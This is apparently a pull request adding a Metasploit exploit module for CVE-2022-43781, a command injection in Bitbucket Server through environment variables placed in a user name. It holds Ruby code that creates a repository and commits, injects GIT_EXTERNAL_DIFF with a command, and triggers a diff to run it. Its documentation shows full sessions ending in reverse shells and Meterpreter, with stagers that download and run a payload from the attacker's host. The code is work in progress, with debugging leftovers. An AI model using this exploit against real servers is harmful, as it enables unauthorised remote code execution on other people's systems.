### PR TITLE
Add exploit for Bitbucket env var RCE (CVE-2022-43781)

### DIFF
--- a/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
+++ b/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
@@ -102,6 +102,8 @@ msf6 exploit(multi/http/bitbucket_env_var_rce) > run
 [*] Started reverse TCP handler on 192.168.140.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
 [*] Project creation was successful
 [+] Successfully created repository 'fjNMKiB'
 [+] Commits added: 9e03047ab0802438c2058e49ec757a7be8d222eb, f7683fcc92840ff94e609c8b0a99e165edb5aa7d
@@ -139,6 +141,8 @@ msf6 exploit(multi/http/bitbucket_env_var_rce) > run
 [*] Started reverse TCP handler on 192.168.140.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
 [*] Project creation was successful
 [+] Successfully created repository 'gmoQNc'
 [+] Commits added: d355924ddef6869f5bbd7673c2a2d67c14ccd56d, cbd85c6309ab2830455c1796898f9677e10227e5
@@ -185,6 +189,8 @@ msf6 exploit(multi/http/bitbucket_env_var_rce) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Found version 7.18.1 of Bitbucket
 [+] The target appears to be vulnerable.
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
 [*] Retrieving security token
 [*] Project creation was successful
 [+] Successfully created repository 'GqFji'
@@ -236,31 +242,27 @@ msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
 password => S3cureP@ssword
 msf6 exploit(multi/http/bitbucket_env_var_rce) > run
 
-[*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Started reverse TCP handler on 192.168.140.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Found version 8.4.0 of Bitbucket
 [*] Versions 8.* are vulnerable only if the mesh setting is disabled
 [+] The target appears to be vulnerable.
-[*] Retrieving security token
+[*] No accessible repositories. Will attempt to create a repo
+[*] Failed to find valid project information. Will attempt to create repo
 [*] Project creation was successful
-[+] Successfully created repository 'lNsfbXPfj'
-[+] Commits added: e099800cd2c090219477bc52d7c6607aa5754686, cf0592f40c3a6ed27cee5278b473ad50fa563fd6
+[+] Successfully created repository 'IuNYsZZPl'
+[+] Commits added: 560d760fdcbcf210c2c1b6dd04663381002066e5, 53ada0136f82899451c16a00cb939225dba53336
 [*] Sending payload
-[*] Using URL: http://192.168.140.1:8080/fe4DKfgaY0E3x7L
-[*] Generated command stager: ["wget -qO /tmp/TRwVvMwK http://192.168.140.1:8080/fe4DKfgaY0E3x7L", "chmod +x /tmp/TRwVvMwK", "/tmp/TRwVvMwK", "rm -f /tmp/TRwVvMwK"]
-[*] Client 192.168.140.149 (Wget/1.21.2) requested /fe4DKfgaY0E3x7L
+[*] Using URL: http://192.168.140.1:8080/qt9f0M
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /qt9f0M
 [*] Sending payload to 192.168.140.149 (Wget/1.21.2)
-[*] Command Stager progress -  54.24% done (64/118 bytes)
-[*] Command Stager progress -  72.88% done (86/118 bytes)
-[*] Transmitting intermediate stager...(106 bytes)
+[*] Command Stager progress -  50.46% done (55/109 bytes)
+[*] Command Stager progress -  70.64% done (77/109 bytes)
 [*] Sending stage (1017704 bytes) to 192.168.140.149
-[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:58216) at 2023-03-13 15:20:02 -0500
-[*] Command Stager progress -  83.90% done (99/118 bytes)
-[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Meterpreter session 10 opened (192.168.140.1:4444 -> 192.168.140.149:43360) at 2023-03-14 19:00:00 -0500
+[*] Command Stager progress -  82.57% done (90/109 bytes)
+[*] Command Stager progress - 100.00% done (109/109 bytes)
 [*] Changing user name back to 'administrator'
-[*] Attempting to delete repository 'lNsfbXPfj'
 [+] Repository has been deleted
-[*] Now attempting to delete project 'PfAYOpW'
 [+] Project has been deleted
 
 meterpreter > getuid

--- a/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
+++ b/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
@@ -69,10 +69,10 @@ add the line `mesh.enabled=false`, save the file, and restart Bitbucket.
 3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
 4. Do: `set USERNAME <username>`
 5. Do: `set PASSWORD <pass>`
-5. Do: `set RHOST <target_ip>`
-5. Do: `set LHOST <listen_ip>`
-6. Do: `run`
-7. You should get a shell.
+6. Do: `set RHOST <target_ip>`
+7. Do: `set LHOST <listen_ip>`
+8. Do: `run`
+9. You should get a shell.
 
 ## Options
 

--- a/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
+++ b/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
@@ -69,6 +69,8 @@ add the line `mesh.enabled=false`, save the file, and restart Bitbucket.
 3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
 4. Do: `set USERNAME <username>`
 5. Do: `set PASSWORD <pass>`
+5. Do: `set RHOST <target_ip>`
+5. Do: `set LHOST <listen_ip>`
 6. Do: `run`
 7. You should get a shell.
 

--- a/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
+++ b/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
@@ -1,0 +1,268 @@
+## Vulnerable Application
+
+For various versions of Bitbucket, there is an authenticated command injection
+vulnerability that can be exploited by injecting environment
+variables into a user name. This module achieves remote code execution
+as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment
+variable, a null character as a delimiter, and arbitrary code into a user's
+user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
+will be run once the Bitbucket application is coerced into generating a diff.
+
+This module requires at least admin credentials, as admins and above only have the
+option to change their user name.
+
+The [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html) lists the following versions as vulnerable:
+
+    * 7.0 to 7.5 (all versions)
+    * 7.6.0 to 7.6.18
+    * 7.7 to 7.16 (all versions)
+    * 7.17.0 to 7.17.11
+    * 7.18 to 7.20 (all versions)
+    * 7.21.0 to 7.21.5
+
+If mesh.enabled=false is set in bitbucket.properties:
+
+    * 8.0.0 to 8.0.4
+    * 8.1.0 to 8.1.4
+    * 8.2.0 to 8.2.3
+    * 8.3.0 to 8.3.2
+    * 8.4.0 to 8.4.1
+
+### Installation Instructions
+
+1. Install Git on the target machine
+  * For Linux
+    * sudo apt install -y git
+  * For Windows
+    * Download an [installer](https://github.com/git-for-windows/git/releases/download/v2.39.2.windows.1/Git-2.39.2-64-bit.exe)
+    * Selecting all defaults should be fine
+2. Download a vulnerable version of Bitbucket. For example, version `7.18.1` can be found
+[here for Linux](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-7.18.1-x64.bin) and [here for Windows](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-7.18.1-x64.exe)
+3. For Linux, make sure the resulting bin file is executable and run it. Just double click on the installer file if using Windows
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990. If installing an 8.* version of Bitbucket, you will need to create
+a `bitbucket.properties` file at `/var/atlassian/application-data/bitbucket/shared`. Once created,
+add the line `mesh.enabled=false`, save the file, and restart Bitbucket.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/bitbucket_env_var_rce`
+4. Do: `set USERNAME <username>`
+5. Do: `set PASSWORD <pass>`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+
+### USERNAME
+
+Username to authenticate with and has at least admin privileges
+
+### PASSWORD
+
+Password to authenticate with
+
+## Scenarios
+
+### Ubuntu 22.04 x64 - Bitbucket `v7.6.17`, CMD Target
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
+rhost => 192.168.140.149
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username test
+username => test
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password password
+password => password
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Project creation was successful
+[+] Successfully created repository 'fjNMKiB'
+[+] Commits added: 9e03047ab0802438c2058e49ec757a7be8d222eb, f7683fcc92840ff94e609c8b0a99e165edb5aa7d
+[*] Sending payload
+[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.149:41118) at 2023-03-13 14:04:00 -0500
+[*] Changing user name back to 'test'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+uname -a
+Linux gitlab-virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
+```
+
+### Ubuntu 22.04 x64 - Bitbucket `v7.6.17`, Linux Dropper
+
+```
+msf6 exploit(multi/http/bitbucket_env_var_rce) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+    0   Linux Command
+=>  1   Linux Dropper
+    2   Windows Dropper
+
+
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Project creation was successful
+[+] Successfully created repository 'gmoQNc'
+[+] Commits added: d355924ddef6869f5bbd7673c2a2d67c14ccd56d, cbd85c6309ab2830455c1796898f9677e10227e5
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/VtgFQ7yCgjcP
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /VtgFQ7yCgjcP
+[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
+[*] Command Stager progress -  53.04% done (61/115 bytes)
+[*] Command Stager progress -  72.17% done (83/115 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.140.149
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:50632) at 2023-03-13 14:06:18 -0500
+[*] Command Stager progress -  83.48% done (96/115 bytes)
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Changing user name back to 'test'
+[+] Repository has been deleted
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: atlbitbucket
+```
+
+### Windows 10, x64 - Bitbucket `v7.18.1`, Windows Dropper
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
+rhost => 192.168.140.171
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
+username => admin
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
+password => P@ssword
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
+target => 2
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found version 7.18.1 of Bitbucket
+[+] The target appears to be vulnerable.
+[*] Retrieving security token
+[*] Project creation was successful
+[+] Successfully created repository 'GqFji'
+[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
+[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
+[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
+[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
+[*] Command Stager progress -  75.19% done (97/129 bytes)
+[*] Sending stage (175686 bytes) to 192.168.140.171
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
+[*] Command Stager progress -  86.05% done (111/129 bytes)
+[*] Command Stager progress - 100.00% done (129/129 bytes)
+[*] Changing user name back to 'admin'
+[*] Attempting to delete repository 'GqFji'
+[+] Repository has been deleted
+[*] Now attempting to delete project 'eTzDRa'
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: DESKTOP-5JSUGC8\atlbitbucket
+meterpreter > sysinfo
+Computer        : DESKTOP-5JSUGC8
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x86/windows
+```
+
+### Ubuntu 22.04 x64 - Bitbucket `v8.4.0` with mesh.enabled set to false, Linux Dropper
+
+```
+msf6 > use exploit/multi/http/bitbucket_env_var_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 1
+target => 1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
+rhost => 192.168.140.149
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set username administrator
+username => administrator
+msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
+password => S3cureP@ssword
+msf6 exploit(multi/http/bitbucket_env_var_rce) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found version 8.4.0 of Bitbucket
+[*] Versions 8.* are vulnerable only if the mesh setting is disabled
+[+] The target appears to be vulnerable.
+[*] Retrieving security token
+[*] Project creation was successful
+[+] Successfully created repository 'lNsfbXPfj'
+[+] Commits added: e099800cd2c090219477bc52d7c6607aa5754686, cf0592f40c3a6ed27cee5278b473ad50fa563fd6
+[*] Sending payload
+[*] Using URL: http://192.168.140.1:8080/fe4DKfgaY0E3x7L
+[*] Generated command stager: ["wget -qO /tmp/TRwVvMwK http://192.168.140.1:8080/fe4DKfgaY0E3x7L", "chmod +x /tmp/TRwVvMwK", "/tmp/TRwVvMwK", "rm -f /tmp/TRwVvMwK"]
+[*] Client 192.168.140.149 (Wget/1.21.2) requested /fe4DKfgaY0E3x7L
+[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
+[*] Command Stager progress -  54.24% done (64/118 bytes)
+[*] Command Stager progress -  72.88% done (86/118 bytes)
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.140.149
+[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:58216) at 2023-03-13 15:20:02 -0500
+[*] Command Stager progress -  83.90% done (99/118 bytes)
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Changing user name back to 'administrator'
+[*] Attempting to delete repository 'lNsfbXPfj'
+[+] Repository has been deleted
+[*] Now attempting to delete project 'PfAYOpW'
+[+] Project has been deleted
+
+meterpreter > getuid
+Server username: atlbitbucket
+```

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -240,6 +240,11 @@ class MetasploitModule < Msf::Exploit::Remote
     token = token_data['value']
     fail_with(Failure::UnexpectedReply, 'No token found') if token.blank?
 
+    dropdown_data = html_doc.at('li[@class="user-dropdown"]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank?
+    email = dropdown_data&.at('span')&.[]('data-emailaddress')
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank?
+
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => repo_uri,
@@ -263,9 +268,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404
     print_good("Successfully created repository #{repo_name}")
+
+    email
   end
 
-  def create_commit(username)
+  def create_commit(username, email)
     # create a text file with random text
     txt_data = Rex::Text.rand_text_alpha(5..20)
     blob_object = GitObject.build_blob_object(txt_data)
@@ -278,7 +285,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     tree_obj = GitObject.build_tree_object(file_data)
 
-    commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: 'blair@okon.name' })
+    commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: email })
 
     # create a packfile for repo and push to default branch
     refs = {
@@ -295,7 +302,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res
-    # require 'pry';binding.pry
+    fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok')
+
+    commit_obj.sha1
   end
 
   def change_username; end
@@ -318,7 +327,8 @@ class MetasploitModule < Msf::Exploit::Remote
       change_username
     end
 
-    create_repository(username)
-    create_commit(username)
+    email = create_repository(username)
+    commit_sha = create_commit(username, email)
+    print_good("Commit added: #{commit_sha}")
   end
 end

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Git
   include Msf::Exploit::Git::SmartHttp
+  require 'pry-byebug'
 
   def initialize(info = {})
     super(
@@ -27,18 +28,20 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],
           [ 'CVE', '2022-43781']
         ],
-        'Platform' => [ 'win', 'linux' ],
+        'Payload' => { 'Space' => 254 },
+        'Platform' => [ 'win', 'linux', 'unix' ],
         'Privileged' => false,
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Targets' => [
           [
             'Linux',
             {
-              'Platform' => 'linux',
+              'Platform' => 'unix',
               'Type' => :linux_cmd,
-              'Arch' => [ ARCH_X86, ARCH_X64 ],
-              'Payload' => { 'BadChars' => %(*:/?#[]@) },
-              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+              # 'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Arch' => [ ARCH_CMD ],
+              'Payload' => { 'BadChars' => %(*:/?#[]@) }
+              # 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
             }
           ],
           [
@@ -187,12 +190,25 @@ class MetasploitModule < Msf::Exploit::Remote
     [ u_name_payload, pass ]
   end
 
+  def project_name
+    @project_name ||= Rex::Text.rand_text_alpha(5..9)
+  end
+
+  def project_key
+    @project_key ||= Rex::Text.rand_text_alpha(5..9).upcase
+  end
+
   def repo_name
     @repo_name ||= Rex::Text.rand_text_alpha(5..9)
   end
 
   def default_branch
     @default_branch ||= Rex::Text.rand_text_alpha(5..9)
+  end
+
+  def uname_payload
+    # @uname_payload ||= "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded.strip})"
+    @uname_payload ||= "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(/usr/bin/printf HACKED > /tmp/hax)"
   end
 
   def log_in(username, password)
@@ -206,6 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'j_username' => username,
         'j_password' => password,
+        '_atl_remember_me' => 'on',
         'submit' => 'Log in'
       }
     )
@@ -223,8 +240,44 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def create_repository(username)
-    repo_uri = normalize_uri(target_uri.path, 'users', username, 'repos?create')
+  def create_project
+    proj_uri = normalize_uri(target_uri.path, 'projects?create')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => proj_uri,
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Unable to access project creation page') unless res&.body&.include?('Create project')
+
+    vprint_status('Retrieving security token')
+    html_doc = res.get_html_document
+    token_data = html_doc.at('div//input[@name="atl_token"]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data
+
+    @token = token_data['value']
+    fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank?
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => proj_uri,
+      'keep_cookies' => true,
+      'vars_post' => {
+        'name' => project_name,
+        'key' => project_key,
+        'submit' => 'Create project',
+        'atl_token' => @token
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to receive response from project creation') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key)
+
+    print_status('Project creation was successful')
+  end
+
+  def create_repository
+    repo_uri = normalize_uri(target_uri.path, 'projects', project_key, 'repos?create')
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => repo_uri,
@@ -234,11 +287,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res
 
     html_doc = res.get_html_document
-    token_data = html_doc.at('div//input[@name="atl_token"]')
-    fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data
-
-    token = token_data['value']
-    fail_with(Failure::UnexpectedReply, 'No token found') if token.blank?
 
     dropdown_data = html_doc.at('li[@class="user-dropdown"]')
     fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank?
@@ -248,22 +296,23 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => repo_uri,
+      'keep_cookies' => true,
       'vars_post' => {
         'name' => repo_name,
         'defaultBranchId' => default_branch,
         'description' => '',
         'scmId' => 'git',
         'forkable' => 'false',
-        'atl_token' => token,
+        'atl_token' => @token,
         'submit' => 'Create repository'
-      },
-      'keep_cookies' => true
+      }
     )
 
     fail_with(Failure::UnexpectedReply, 'Not response received from repo creation') unless res
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'users', username, 'repos', repo_name, 'browse')
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'projects', project_key, 'repos', repo_name, 'browse')
     )
 
     fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404
@@ -272,7 +321,7 @@ class MetasploitModule < Msf::Exploit::Remote
     email
   end
 
-  def create_commit(username, email)
+  def create_commits(email)
     # create a text file with random text
     txt_data = Rex::Text.rand_text_alpha(5..20)
     blob_object = GitObject.build_blob_object(txt_data)
@@ -287,27 +336,119 @@ class MetasploitModule < Msf::Exploit::Remote
 
     commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: email })
 
-    # create a packfile for repo and push to default branch
     refs = {
       'HEAD' => "refs/heads/#{default_branch}",
       "refs/heads/#{default_branch}" => commit_obj.sha1
     }
 
-    git_uri = normalize_uri(target_uri.path, "scm/~#{username}/#{repo_name}.git")
+    # create second commit object
+    new_file_data = Rex::Text.rand_text_alpha(5..20)
+    new_blob_object = GitObject.build_blob_object(new_file_data)
+    new_file = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
+
+    new_file_data = {
+      mode: '100755',
+      file_name: new_file,
+      sha1: new_blob_object.sha1
+    }
+
+    tree_data = [ new_file_data, file_data ]
+    new_tree = GitObject.build_tree_object(tree_data)
+    new_commit = GitObject.build_commit_object(
+      {
+        tree_sha1: new_tree.sha1,
+        email: email,
+        parent_sha1: commit_obj.sha1,
+        message: Rex::Text.rand_text_alpha(4..30)
+      }
+    )
+
+    git_uri = normalize_uri(target_uri.path, "scm/#{project_key}/#{repo_name}.git")
     res = send_receive_pack_request(
       git_uri,
       refs['HEAD'],
-      [ commit_obj, tree_obj, blob_object ],
+      [ new_commit, new_tree, new_blob_object, commit_obj, tree_obj, blob_object ],
       '0' * 40 # no commits should exist yet, so no branch tip in repo yet
     )
 
     fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res
+    fail_with(Failure::UnexpectedReply, 'Git responded with an error') if res.body.include?('error:')
     fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok')
 
-    commit_obj.sha1
+    [ new_commit.sha1, commit_obj.sha1, new_file ]
   end
 
-  def change_username; end
+  def get_user_id(curr_uname)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin/users/view'),
+      'vars_get' => { 'name' => curr_uname }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to access user page') unless res
+    scripts = res.get_html_document&.search('script')
+    fail_with(Failure::UnexpectedReply, 'Couldn\'t obtain list of scripts') unless scripts
+    scripts = scripts.select { |script| script&.children&.text&.include?("name\":\"#{curr_uname}\"") }
+    fail_with(Failure::UnexpectedReply, 'Failed to get scripts that match user name') unless scripts
+
+    matched_id = scripts&.first&.children&.text&.match(/id":(\d+),"displayName/)
+    fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1
+
+    matched_id[1]
+  end
+
+  def change_username(curr_uname, new_uname)
+    @user_id ||= get_user_id(curr_uname)
+
+    headers = {
+      'X-Requested-With' => 'XMLHttpRequest',
+      'X-AUSERNAME' => curr_uname,
+      'X-AUSERID' => @user_id,
+      'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
+      'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/admin/users/view?name=#{curr_uname}"
+    }
+
+    vars = {
+      'name' => curr_uname,
+      'newName' => new_uname
+    }.to_json
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/admin/users/rename'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => headers,
+      'data' => vars
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Did not receive a response to the user name change request') unless res
+
+    unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF')
+      fail_with(Failure::UnexpectedReply, 'User name change was unsuccessful')
+    end
+  end
+
+  def view_commit(latest_commit_sha, first_commit_sha, diff_file)
+    commit_uri = normalize_uri(
+      target_uri.path,
+      'rest/api/latest/projects',
+      project_key,
+      'repos',
+      repo_name,
+      'commits',
+      latest_commit_sha,
+      'diff',
+      diff_file
+    )
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => commit_uri,
+      'keep_cookies' => true,
+      'vars_get' => { 'since' => first_commit_sha }
+    )
+  end
 
   def exploit
     datastore['GIT_USERNAME'] = datastore['USERNAME']
@@ -323,12 +464,23 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::BadConfig, 'No credentials to log in with.') unless username && password
 
     log_in(username, password)
+=begin
     unless @using_public_account
       change_username
     end
+=end
 
-    email = create_repository(username)
-    commit_sha = create_commit(username, email)
-    print_good("Commit added: #{commit_sha}")
+    create_project
+    email = create_repository
+    latest_commit, first_commit, diff_file = create_commits(email)
+    print_good("Commits added: #{first_commit}, #{latest_commit}")
+
+    print_status('Sending payload')
+    change_username(datastore['USERNAME'], uname_payload)
+    view_commit(latest_commit, first_commit, diff_file)
+  end
+
+  def cleanup
+    change_username(uname_payload, datastore['USERNAME'])
   end
 end

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -1,0 +1,222 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
